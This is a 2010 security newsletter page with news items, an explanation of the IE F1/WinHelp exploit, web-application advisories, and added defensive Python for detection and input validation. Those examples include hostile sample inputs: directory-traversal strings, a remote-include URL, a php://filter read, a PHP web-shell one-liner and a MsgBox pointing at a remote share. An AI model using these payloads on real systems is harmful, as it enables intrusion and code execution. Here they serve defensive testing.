Date 03.05.10
   
   
New zero-day flaw in Internet Explorer threatens Windows XP users
Buffer Overflow Vulnerability in Lotus iNotes ActiveX Control
A Teenager crashes the Sony PlayStation Web Site
Ultra-secure Firefox offered to UK bank users
World of Warcraft authenticated users come under attack
Thu, Mar 04 2010
Security vendors Sourcefire and Immunet have partnered up to swap technologies behind their antivirus products. The new Windows version of ClamAV, the well-known open source antivirus solution from Sourcefire, integrates with Immunet's cloud for better malware intelligence.
Thu, Mar 04 2010
The leader of a UK-based gang who made millions selling counterfeit luxury golf kit and other knock-off goods through auction site eBay has been jailed for four years.
Thu, Mar 04 2010
Hackers breaking into businesses and government agencies with targeted attacks have not only stolen intellectual property, in some cases they have corrupted data too, the head of the U.S. Federal Bureau of Investigation said Thursday.
Thu, Mar 04 2010
Hoping to catch cybercrooks, the FBI has begun embedding agents with law enforcement agencies in Estonia, the Ukraine and the Netherlands.
Thu, Mar 04 2010
Security penetration testers Mike Bailey and Mike Murray rely heavily on attacks that exploit weaknesses in websites and servers, but their approach is better summed up by the famous phrase 'There's a sucker born every minute'.
Thu, Mar 04 2010
The Mariposa botnet had the power to dwarf Georgia and Estonia cyberattacks if it had been used to launch denial of service attacks, say Spanish police.
Thu, Mar 04 2010
Computer scientists say they've discovered a 'severe vulnerability' in the world's most widely used software encryption package that allows them to retrieve a machine's secret cryptographic key.
Wed, Mar 03 2010
Google has reiterated that it is no longer willing to censor search results in China. It continues to censor them for now, however, and has not said when this will actually stop.
Wed, Mar 03 2010
Contrary to popular assumptions, the recent cyberattacks against Google and more than 30 other high-tech companies were carried out by relatively unsophisticated attackers using outdated botnet tools, according to Damballa Inc., an Atlanta-based security firm.
Wed, Mar 03 2010
Russian AV vendor Kaspersky has introduced Kaspersky PURE, a security package that is specifically designed to meet the needs of multi-PC households.
 
70 additional records not shown
Exploit of the week
We at CERTStation Labs have selected an exploit released for Microsoft Internet Explorer. It is a remote command execution exploit triggered when a user presses F1 on a MessageBox that originates from VBScript within a web page. When the user hits F1, the MessageBox help functionality attempts to load and use an HLP file from an SMB or WebDAV server, and WinHelp files can carry macros that launch programs. This particular exploit implements a WebDAV server that serves the HLP file as well as a payload EXE. Two things must hold for it to work: the victim has to press F1 in the dialog, and the victim's machine must be able to reach the attacker's SMB or WebDAV server outbound. The underlying flaw was unpatched at the time of writing (see the 03 March item below).
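The pattern that exploit depends on can be looked for in page content. The scanner below is an added example, not code from the original page or from the exploit it describes. It assumes the documented VBScript signature MsgBox(prompt, buttons, title, helpfile, context), under which the fourth argument is the HLP file the help subsystem opens on F1, and flags any MsgBox call inside a VBScript block whose help file is a UNC path or a URL. The sample pages and the host 203.0.113.9 are constructed.

```python
"""Flag VBScript MsgBox calls whose help-file argument points off-host.

Added example, not code from the original page or from the exploit it
describes. Assumes the documented VBScript signature
MsgBox(prompt, buttons, title, helpfile, context): the fourth argument is
the HLP file the help subsystem opens when the user presses F1.
"""
import re

# <script language="VBScript"> or <script type="text/vbscript"> blocks only.
SCRIPT_RE = re.compile(
    r"<script[^>]*\b(?:language|type)\s*=\s*['\"]?(?:text/)?vbscript['\"]?[^>]*>"
    r"(.*?)</script>",
    re.IGNORECASE | re.DOTALL,
)
MSGBOX_RE = re.compile(r"\bMsgBox\b\s*\(?\s*(.*)", re.IGNORECASE)
# UNC path (\\host\share\file.hlp) or a URL the WebDAV redirector would fetch.
REMOTE_RE = re.compile(r"^(?:\\\\|//|https?://)", re.IGNORECASE)


def split_vb_args(text):
    """Split one VBScript argument list on top-level commas.

    String literals keep their commas and parentheses; a doubled "" inside
    a literal is an escaped quote. Stops at the ")" that closes the call.
    """
    args, buf, in_str, depth, i = [], [], False, 0, 0
    while i < len(text):
        ch = text[i]
        if in_str:
            if ch == '"' and text[i + 1:i + 2] == '"':
                buf.append('"')
                i += 1
            elif ch == '"':
                in_str = False
            else:
                buf.append(ch)
        elif ch == '"':
            in_str = True
        elif ch == "(":
            depth += 1
            buf.append(ch)
        elif ch == ")":
            if depth == 0:
                break
            depth -= 1
            buf.append(ch)
        elif ch == "," and depth == 0:
            args.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
        i += 1
    args.append("".join(buf).strip())
    return args


def find_remote_helpfiles(html):
    """Return the help-file argument of every VBScript MsgBox call that
    names a UNC path or URL. Only literal strings are resolved: a helpfile
    built from variables or concatenation needs a real script interpreter."""
    hits = []
    for block in SCRIPT_RE.finditer(html):
        for line in block.group(1).splitlines():
            call = MSGBOX_RE.search(line)
            if call is None:
                continue
            args = split_vb_args(call.group(1))
            if len(args) >= 4 and REMOTE_RE.match(args[3]):
                hits.append(args[3])
    return hits


# Constructed sample pages; 203.0.113.9 is a documentation address.
BENIGN_PAGE = """<html><body>
<script language="VBScript">
MsgBox "Welcome back", vbInformation, "Portal"
</script></body></html>"""

SUSPECT_PAGE = """<html><body>
<script type="text/vbscript">
Dim r
r = MsgBox("Press F1 for help", 0, "Support", "\\\\203.0.113.9\\share\\help.hlp", 1)
MsgBox "Second dialog", 0, "Support", "http://203.0.113.9/dav/help.hlp", 1
</script>
<script type="text/javascript">
// MsgBox "x", 0, "y", "\\\\203.0.113.9\\share\\help.hlp", 1  (not VBScript, so ignored)
</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("suspect", SUSPECT_PAGE)):
        print(name, find_remote_helpfiles(page))
```

Run it over crawled or proxied HTML. A hit does not prove malice, but a legitimate page has little reason to point Internet Explorer's help at a remote share or WebDAV URL. A help file passed through a variable or built by concatenation is not resolved, so treat this as a first-pass filter rather than a verdict.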
 
Security tool of the week
The security tool of the week selected by CERTStation Labs is Ncrack. Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack was designed using a modular approach, a command-line syntax similar to Nmap's and a dynamic engine that can adapt its behaviour based on network feedback. It allows for rapid yet reliable large-scale auditing of multiple hosts. Ncrack's features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated brute-forcing attacks, timing templates for ease of use, runtime interaction similar to Nmap's and many more. As with any password-guessing tool, run it only against systems you are authorised to test, and expect account lockouts where lockout policies are in force.
 
The website selected this week by CERTStation Labs is http://blog.fireeye.com/. FireEye provides anti-botnet protection, enabling organizations to protect critical intellectual property, computing resources and network infrastructure against bot infiltration. Many of today's most damaging attacks originate from and pass through highly organized botnets, networks of remotely controlled, compromised machines. FireEye's solution is designed from the ground up to detect botnet activity and protect organizations from it through a combination of global intelligence and local security analysis and enforcement.
Wed, Mar 03, 2010
Microsoft has confirmed that an unpatched Internet Explorer vulnerability makes it potentially dangerous to press F1 if you are running earlier versions of Windows. A security bug in the VBScript technology bundled with Internet Explorer means that it might be possible to create a web site that displays a specially crafted dialog box and pushes malware, provided the victim is tricked into pressing the F1 (help) key while viewing the booby-trapped site in Internet Explorer.
Tue, Mar 02, 2010
The Lotus iNotes ActiveX control for reading email from within a browser contains a programming error which can result in a buffer overflow. This could be exploited by an attacker to infect an iNotes user with spyware when they visit a crafted web page.
Fri, Mar 05 2010
IBM Lotus iNotes (aka Domino Web Access or DWA) 6.5, 7.0 before 7.0.4, 8.0, and 8.0.2 before 229.281 for Domino 8.0.2 FP4 is prone to a buffer overflow vulnerability. The issue occurs due to improper processing of a long URL argument to an unspecified method in the Lotus Domino Web Access ActiveX control. This could be exploited by remote attackers to execute arbitrary code on the vulnerable system when a user visits a crafted web page with the control installed.
Severity
Thu, Mar 04 2010
A cross-site request forgery vulnerability has been discovered in IBM Lotus iNotes (aka Domino Web Access or DWA), versions before 229.281 for Domino 8.0.2 FP4. The issue is triggered by an error in the application's handling of vectors related to the Get Filter and Referer Check fixes. Exploitation requires that a user interact with the attack mechanism, for example by visiting a crafted page while logged in. This could allow a remote attacker to hijack the authentication of unspecified victims.
Severity
Thu, Mar 04 2010
A cross-site scripting vulnerability has been discovered in IBM Lotus iNotes (aka Domino Web Access or DWA), versions before 229.281 for Domino 8.0.2 FP4. The issue is triggered by an error in the application's handling of vectors related to the Get Filter and Referer Check fixes. Exploitation requires that a user interact with the attack mechanism. This could allow a remote attacker to inject arbitrary web script into pages served to other users.
Severity
Mon, Mar 01 2010
The Core Design Scriptegrator plugin 1.4.1 for Joomla! is prone to multiple directory traversal vulnerabilities. The issues occur due to improper sanitization of the "file" parameter to 'libraries/jquery/js/ui/jsloader.php' and the "files[]" parameter to 'libraries/jquery/js/jsloader.php'. This could be exploited by remote attackers to include and execute arbitrary local files via directory traversal sequences. Successful exploitation requires that "magic_quotes_gpc" is disabled, which indicates the traversal relies on a NUL byte (%00) in the parameter; with magic_quotes_gpc enabled, PHP escapes that byte before the script sees it.
Severity
Mon, Mar 01 2010
A PHP remote file inclusion vulnerability has been discovered in WikyBlog, version 1.7.3rc2. The issue is triggered by an input validation error in the 'include/WBmap.php' script when handling the "langFile" parameter. Exploitation of the vulnerability requires that a user interact with the attack mechanism. This could allow remote attackers to execute arbitrary PHP code.
Severity
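The two include bugs above (the Scriptegrator "file"/"files[]" traversal and the WikyBlog "langFile" remote include) are the same mistake: a request parameter is spliced into a path and handed to include(). The resolver below is an added example, not code from either project, written in Python to show the checks a PHP implementation needs to make, in the order they need to be made. BASE_DIR and the sample parameter values are assumptions.

```python
"""Resolve a user-supplied script name to one file under a fixed directory.

Added example, not code from Scriptegrator or WikyBlog. It models the two
include bugs above: a "file"/"files[]" parameter joined onto a path and
handed to include(), and a "langFile" parameter that may name a remote URL.
BASE_DIR is an assumed install path.
"""
import posixpath
import re

BASE_DIR = "/srv/www/joomla/libraries/jquery/js"
ALLOWED_SUFFIXES = (".js",)                # what a script loader is meant to serve
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*:", re.IGNORECASE)   # http:, ftp:, php:, data: ...


class UnsafePath(ValueError):
    pass


def resolve_include(requested, base_dir=BASE_DIR):
    """Return the absolute file to include, or raise UnsafePath."""
    if not requested:
        raise UnsafePath("empty name")
    if "\x00" in requested:
        # A NUL truncates the C string PHP opens, discarding any suffix the
        # script appends; magic_quotes_gpc would have turned it into "\0".
        raise UnsafePath("embedded NUL byte")
    if SCHEME_RE.match(requested) or requested.startswith(("//", "\\\\")):
        raise UnsafePath("remote location")            # the RFI case
    name = requested.replace("\\", "/")
    if name.startswith("/"):
        raise UnsafePath("absolute path")
    candidate = posixpath.normpath(posixpath.join(base_dir, name))
    # Containment by common path on the normalized result, not a string
    # prefix test: a sibling directory such as ".../js-old" begins with the
    # BASE_DIR string but is not inside it.
    if posixpath.commonpath([base_dir, candidate]) != base_dir:
        raise UnsafePath("escapes base directory")
    if not candidate.endswith(ALLOWED_SUFFIXES):
        raise UnsafePath("disallowed file type")
    return candidate


def verdict(requested):
    """'ok:<path>' or 'rejected:<reason>' for one parameter value."""
    try:
        return "ok:" + resolve_include(requested)
    except UnsafePath as exc:
        return "rejected:" + str(exc)


# Constructed parameter values of the kinds the two advisories describe.
SAMPLE_REQUESTS = [
    "ui/jquery.ui.core.js",
    "ui/../jquery.js",
    "../../../../../../etc/passwd",
    "../../../../../../etc/passwd\x00",
    "..\\..\\..\\configuration.php",
    "../js-old/x.js",
    "/etc/passwd",
    "http://203.0.113.9/shell.txt",
    "php://filter/read=convert.base64-encode/resource=index.php",
]

if __name__ == "__main__":
    for value in SAMPLE_REQUESTS:
        print(repr(value), "->", verdict(value))
```

The order matters: the NUL and scheme checks run on the raw parameter before any normalisation, because normalisation would silently drop or reinterpret exactly the bytes that make the attack work. Resolving symlinks (realpath) before the containment check is the one extra step a production version needs on a filesystem where BASE_DIR may contain links.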
Mon, Mar 01 2010
A session fixation vulnerability has been discovered in WikyBlog, version 1.7.3rc2. The issue is triggered by an input validation error in the "jsessionid" parameter of the 'index.php/Comment/Main', 'index.php/Comment/Main/Home_Wiky', and 'index.php/Edit/Main' scripts: a session identifier supplied by the client is accepted as the session's own. This could allow remote attackers to hijack web sessions.
Severity
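To make the session fixation above concrete, here is the vulnerable pattern next to a hardened one. This is an added example, not WikyBlog code: two in-memory session stores, one that adopts a presented jsessionid as-is, one that only honours ids it issued itself and rotates the id at login, plus a function that plays the attack against either.

```python
"""Session handling that never adopts a client-chosen session id.

Added example, not WikyBlog code. The advisory above boils down to this:
a "jsessionid" arriving in the request is honoured as the session id, so an
attacker can plant an id, lure the victim to log in under it, and then
present the same id to act as the victim. Both stores below are in-memory
stand-ins for a real session backend.
"""
import secrets
import time


class SessionStore:
    """Hardened: ids are minted server-side and rotated at login."""

    def __init__(self, ttl_seconds=1800):
        self._sessions = {}          # sid -> {"user": str|None, "created": float}
        self.ttl = ttl_seconds

    def _lookup(self, sid, now):
        s = self._sessions.get(sid)
        if s is None or now - s["created"] > self.ttl:
            self._sessions.pop(sid, None)
            return None
        return s

    def start(self, presented_sid=None, now=None):
        """Begin a request. A presented id is used only if this server
        issued it and it is still live; anything else gets a fresh id."""
        now = time.time() if now is None else now
        if presented_sid and self._lookup(presented_sid, now) is not None:
            return presented_sid
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None, "created": now}
        return sid

    def login(self, sid, user, now=None):
        """Authenticate and rotate: the pre-login id stops working, so an id
        the attacker knew before login is worthless afterwards."""
        now = time.time() if now is None else now
        if self._lookup(sid, now) is None:
            raise KeyError("unknown session")
        del self._sessions[sid]
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = {"user": user, "created": now}
        return new_sid

    def user_for(self, sid, now=None):
        now = time.time() if now is None else now
        s = self._lookup(sid, now)
        return None if s is None else s["user"]


class FixatableStore(SessionStore):
    """The pattern behind the advisory: a presented id is adopted as-is and
    survives login unchanged."""

    def start(self, presented_sid=None, now=None):
        now = time.time() if now is None else now
        if presented_sid:
            self._sessions.setdefault(presented_sid, {"user": None, "created": now})
            return presented_sid
        return super().start(None, now)

    def login(self, sid, user, now=None):
        now = time.time() if now is None else now
        s = self._lookup(sid, now)
        if s is None:
            raise KeyError("unknown session")
        s["user"] = user
        return sid


def fixation_attack(store, planted="PLANTED-BY-ATTACKER"):
    """The attacker sends the victim a link carrying jsessionid=<planted>;
    the victim follows it and logs in as alice. Returns what the attacker
    sees when presenting the planted id afterwards: 'alice' if hijacked,
    None if the store held up."""
    victim_sid = store.start(presented_sid=planted)
    store.login(victim_sid, "alice")
    return store.user_for(planted)


if __name__ == "__main__":
    print("vulnerable store:", fixation_attack(FixatableStore()))
    print("hardened store:  ", fixation_attack(SessionStore()))
```

Two properties do the work: an id that the server did not issue is never adopted, and login always issues a new id. Either alone is commonly skipped; frameworks that only do the second still let an attacker who can read the post-login id (for example from a URL-carried jsessionid) hijack the session, which is the reason to keep the id in a cookie rather than the URL.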
Mon, Mar 01 2010
An unrestricted file upload vulnerability has been discovered in WikyBlog, version 1.7.3rc2. The issue is triggered by an input validation error in the 'index.php/Attach' script when using the 'uploadform' action, combined with the uploaded file being served on a direct request to 'userfiles/[username]/uploaded/'. This could allow remote authenticated users to execute arbitrary code by uploading a file with an executable extension.
Severity
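The unrestricted upload above has the standard shape: the file is stored under its client-chosen name inside a directory the web server will execute from. The validator below is an added example, not WikyBlog code; the allowed types, their magic bytes and the sample uploads are assumptions for a site that only wants images, PDFs and plain text. Writing the result outside DocumentRoot under the server-chosen name, and serving it with a fixed Content-Type, is the other half and belongs to the application's storage layer.

```python
"""Accept an upload only if its name, extension and content check out, and
return a server-chosen name for it.

Added example, not WikyBlog code. The advisory above: 'Attach' keeps the
uploader's filename under userfiles/<user>/uploaded/, so a .php upload is
executed when requested. The allow-list and magic bytes here are assumptions
for a site that only wants images, PDFs and plain text.
"""
import os
import secrets

# extension -> leading bytes a genuine file of that type starts with (None: no magic)
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
    "txt": None,
}
# Anything a typical PHP/CGI host might hand to an interpreter or honour as config.
EXECUTABLE = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl", "py",
              "sh", "asp", "aspx", "jsp", "htaccess"}


class UploadRejected(ValueError):
    pass


def validate_upload(filename, data, max_bytes=2_000_000):
    """Return (stored_name, ext) for an acceptable upload, else raise."""
    if len(data) > max_bytes:
        raise UploadRejected("too large")
    base = os.path.basename(filename.replace("\\", "/"))    # drop any client-supplied path
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[-1] or "\x00" in base:
        raise UploadRejected("no usable extension")
    # Every extension counts, not just the last: "shell.php.jpg" can still be
    # run by servers (Apache mod_mime) that act on any recognised suffix.
    if any(p in EXECUTABLE for p in parts[1:]):
        raise UploadRejected("executable extension")
    ext = parts[-1]
    if ext not in ALLOWED:
        raise UploadRejected("extension not allowed")
    magic = ALLOWED[ext]
    if magic is not None and not data.startswith(magic):
        raise UploadRejected("content does not match extension")
    if magic is None:
        try:
            data.decode("utf-8")
        except UnicodeDecodeError:
            raise UploadRejected("text file is not UTF-8") from None
    # Nothing from the client survives into the stored name.
    return f"{secrets.token_hex(16)}.{ext}", ext


def verdict(filename, data):
    """'ok:<ext>' or 'rejected:<reason>', convenient for logging and tests."""
    try:
        return "ok:" + validate_upload(filename, data)[1]
    except UploadRejected as exc:
        return "rejected:" + str(exc)


# Constructed uploads of the kinds the advisory is about.
SAMPLE_UPLOADS = [
    ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 32),
    ("shell.php", b"<?php system($_GET['c']); ?>"),
    ("shell.php.jpg", b"\xff\xd8\xff\xe0" + b"<?php system($_GET['c']); ?>"),
    ("shell.jpg", b"<?php system($_GET['c']); ?>"),
    ("../../.htaccess", b"AddType application/x-httpd-php .jpg\n"),
    ("notes.txt", "plain notes \u00e9".encode("utf-8")),
    ("binary.txt", b"\xff\xfe\x00\x01"),
]

if __name__ == "__main__":
    for name, data in SAMPLE_UPLOADS:
        print(name, "->", verdict(name, data))
```

Note that a valid JPEG header followed by PHP code passes the magic check; the validator cannot tell a polyglot from a photo. That is why the stored name is server-chosen with an allow-listed extension and the file must live where no interpreter is mapped, so that even a polyglot is only ever served as bytes.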
Sun, Feb 28 2010
DVBSExeCall.ocx in DATEV Base System (aka Grundpaket Basis) is prone to a command execution vulnerability. The issue occurs due to improper sanitization of inputs to the "ExecuteExe" method of the 'DVBSExeCall Control' ActiveX control 1.0.0.1 in 'DVBSExeCall.ocx'. This could be exploited by remote attackers to execute arbitrary commands on the vulnerable system when a user visits a crafted web page with the control installed.
Severity
Fri, Mar 05 2010
Multiple buffer overflow vulnerabilities have been discovered in BigAnt Server, versions 2.50 SP6 and earlier. The issues arise due to improper handling of the "Update" or "Plug-In" console menu items when the victim uses them. This could be exploited by a remote attacker to cause a denial of service via a crafted ZIP file.
Severity
Fri, Mar 05 2010
A stack-based buffer overflow vulnerability has been discovered in BigAnt IM Server, version 2.50. The vulnerability is triggered by a boundary condition error in the AntServer module (AntServer.exe) when processing overly long HTTP GET requests sent to port 6660/TCP. This could be exploited by a remote attacker to execute arbitrary code on a vulnerable system.
Severity
 
53 additional records not shown
Mon, Mar 01 2010
Severity
Aliases:
Infects:Windows 2000,Windows 98,Windows Me,Windows NT,Windows Server 2003,Windows Vista,Windows XP
Mon, Mar 01 2010
Severity
Aliases:
Infects:Windows Me,Windows XP
Mon, Mar 01 2010
Severity
Aliases:
Infects:Windows 2000,Windows 95,Windows 98,Windows Me,Windows NT,Windows Server 2003,Windows Vista,Windows XP
Sat, Feb 27 2010
Severity
Aliases:
Infects:Windows 2000,Windows 95,Windows 98,Windows Me,Windows NT,Windows Server 2003,Windows Vista,Windows XP
 
 
Security Sparklines: Microsoft, OS X, Windows XP, Linux, Internet Explorer, Mozilla
Sparklines show the number of articles that referenced a given topic every day over the last 12 weeks.
Tips of the week
Learning how things work
In the world of information technology there are many books about how to protect a network environment, but are they really worth it? If the techniques they describe worked, why do organizations still get intruded upon? One reason is that books and manuals lag behind practice: attackers evolve their methods to suit each new era and launch far more sophisticated attacks on network environments than ever before, and there is no shortage of examples. The best way to fight these intrusions is to learn the attackers' ways by doing them. By "doing" we do not mean attacking our own production network or someone else's network over the Internet, but practising in a lab environment; there are already many how-tos available on the Internet on this subject.
Turn off IPv6
Internet Protocol version 6 (IPv6) provides a new Internet layer for the TCP/IP protocol suite, designed to replace Internet Protocol version 4 (IPv4), and brings many benefits. At present there are few good tools able to check a system over the network for IPv6 security issues. Most Linux distributions enable IPv6 by default. Attackers can send malicious traffic over IPv6 precisely because most administrators are not monitoring it, and firewall rules written for IPv4 do not apply to it. Unless your network configuration requires IPv6, disable it; if it is required, filter it at the firewall with rules of its own and monitor it like IPv4.
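Before disabling IPv6 it helps to know which interfaces actually carry addresses, since a host is reachable over link-local IPv6 from its own segment even when nobody assigned it a prefix. The audit below is an added example, not from the original page: it parses the kernel's /proc/net/if_inet6 (constructed sample contents here) and emits the per-interface disable_ipv6 sysctl lines for whatever it finds.

```python
"""Show which interfaces on a Linux host carry IPv6 addresses, from the
kernel's /proc/net/if_inet6, and emit the sysctl lines that switch IPv6 off
on the ones that should not have it.

Added example, not from the original page. Runs here on constructed file
contents; on a live host read the real file.
"""
import ipaddress

# Scope values as the kernel prints them in /proc/net/if_inet6.
SCOPES = {0x00: "global", 0x10: "host", 0x20: "link", 0x40: "site"}

# Constructed sample. Fields: address (32 hex digits), ifindex, prefix length,
# scope, flags, interface name. 2001:db8::/32 is the documentation prefix.
SAMPLE_IF_INET6 = """\
00000000000000000000000000000001 01 80 10 80       lo
fe80000000000000020c29fffe3a1b2c 02 40 20 80     eth0
20010db8000000000000000000000010 02 40 00 80     eth0
fe80000000000000020c29fffe3a1b2d 03 40 20 80     eth1
"""


def parse_if_inet6(text):
    """Yield (ifname, address, prefix_len, scope) per address line."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue
        addr_hex, _ifindex, plen_hex, scope_hex, _flags, ifname = fields
        yield (ifname,
               ipaddress.IPv6Address(int(addr_hex, 16)),
               int(plen_hex, 16),
               SCOPES.get(int(scope_hex, 16) & 0xF0, "other"))


def ipv6_exposure(text):
    """Interfaces with any non-loopback IPv6 address, and those addresses.
    Link-local counts: it is reachable from the same segment whether or not
    anyone assigned a global prefix."""
    exposed = {}
    for ifname, addr, plen, scope in parse_if_inet6(text):
        if scope == "host":
            continue
        exposed.setdefault(ifname, []).append(f"{addr}/{plen} ({scope})")
    return exposed


def disable_sysctls(ifnames):
    """sysctl.conf lines using the kernel's per-interface disable_ipv6 knob."""
    return [f"net.ipv6.conf.{name}.disable_ipv6 = 1" for name in sorted(ifnames)]


if __name__ == "__main__":
    exposure = ipv6_exposure(SAMPLE_IF_INET6)
    for name, addrs in exposure.items():
        print(name, ", ".join(addrs))
    print("\n".join(disable_sysctls(exposure)))
```

On a live host replace SAMPLE_IF_INET6 with the contents of /proc/net/if_inet6. Where an interface must keep IPv6, the alternative the tip mentions is filtering: ip6tables keeps its own rule set, so an iptables policy, however strict, says nothing about IPv6 traffic until you write the matching ip6tables rules.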
Accounts and Password policy
Creating accounts is a day-to-day job for an IT department, and there are many places where accounts have to be managed: lab rooms, conference rooms, visitors' lounges, the general working environment and servers. When creating new accounts, be careful about the rights granted and the password chosen. A good password is at least 8 characters long and mixes upper- and lower-case letters, numbers and special characters. Group policy deserves the same attention: a normal user account should not be provisioned in places where there is no need for one.
Metrics
                   Last Week   Total Records*
Viruses                    0              415
Worms                      1             1545
Trojans                    3             2071
Vulnerabilities           63            15274
*since 2004
Podcasts
Name msword.mp3
Time 3:48 mins
Format mp3
Quality 96 Kbps
Published by CERTStation Media
Subject CERTStation's Critical Threat Report about the Zero Day Flaw in MS Word
Name Examine-Sasser.mp3
Time 7:02 mins
Format mp3
Quality 128 Kbps
Published by CERTStation Media
Subject An audio podcast for a post-mortem analysis of the Sasser worm, its structure, propagation, and impact on data infrastructure
Name Spam-Prevent.mp3
Time 8:40 mins
Format mp3
Quality 128 Kbps
Published by CERTStation Media
Subject An audio podcast on how spam is generated, along with an examination of the frameworks and technologies that help manage and reduce spam.
Name Wireless-security.mp3
Time 7:52 mins
Format mp3
Quality 128 Kbps
Published by CERTStation Media
Subject An audio podcast discussion around the diverging wireless security protocols and their impact on WLANs (WEP, WPA, EAP).
Name Vul-Assessment.mp3
Time 6:01 mins
Format mp3
Quality 128 Kbps
Published by CERTStation Media
Subject An audio podcast for understanding vulnerability assessment components, mechanisms and technologies.
   
 
If you can't crawl it you can't test it: Coverage of web application scanners